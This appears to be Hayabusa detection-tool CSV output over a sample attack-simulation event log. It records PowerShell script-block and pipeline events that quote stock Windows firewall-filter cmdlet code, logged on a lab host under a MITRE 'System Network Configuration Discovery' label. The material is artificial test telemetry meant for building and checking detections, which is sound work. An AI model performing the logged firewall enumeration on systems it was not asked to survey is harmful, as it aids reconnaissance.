($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; 
ParameterTyp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Set-NetFirewallSecurityFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { 
param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 
'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallPortFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = 